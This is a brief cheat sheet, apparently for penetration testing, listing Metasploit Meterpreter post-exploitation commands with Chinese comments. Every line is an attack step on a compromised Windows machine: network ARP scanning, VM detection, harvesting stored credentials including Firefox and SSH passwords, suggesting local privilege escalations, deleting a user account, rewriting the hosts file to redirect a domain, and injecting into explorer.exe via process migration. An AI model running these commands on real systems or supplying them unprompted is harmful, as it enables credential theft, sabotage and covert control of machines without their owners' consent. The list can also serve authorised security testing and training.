run post/windows/gather/arp_scanner RHOSTS=192.168.0.0/24 #ARP扫描
run post/windows/gather/checkvm #查询目标是不是虚拟机
run post/windows/gather/credentials/credential_collector #查看用户信息
run post/windows/gather/enum_applications #查看安装了哪些应用程序
run post/windows/gather/enum_logged_on_users #查看目前正在登录的用户
run post/windows/gather/enum_snmp #查看目标机器的snmp配置
run post/multi/recon/local_exploit_suggester #查看本地提权漏洞
run post/windows/manage/delete_user USERNAME=sbz #删除用户账号
run post/multi/gather/env #查看目标机器环境变量
run post/multi/gather/firefox_creds #查看目标本机的firefox流量的账号密码
run post/multi/gather/ssh_creds #查看本机SSH的账号密码
set AutoRunScript hostsedit -e 1.1.1.1,www.baidu.com #修改host文件 set InitialAutoRunScript checkvm
set initialautorunscript migrate -n explorer.exe #注入进程 set autorunscript post/windows/gather/dumplinks #查询最近文件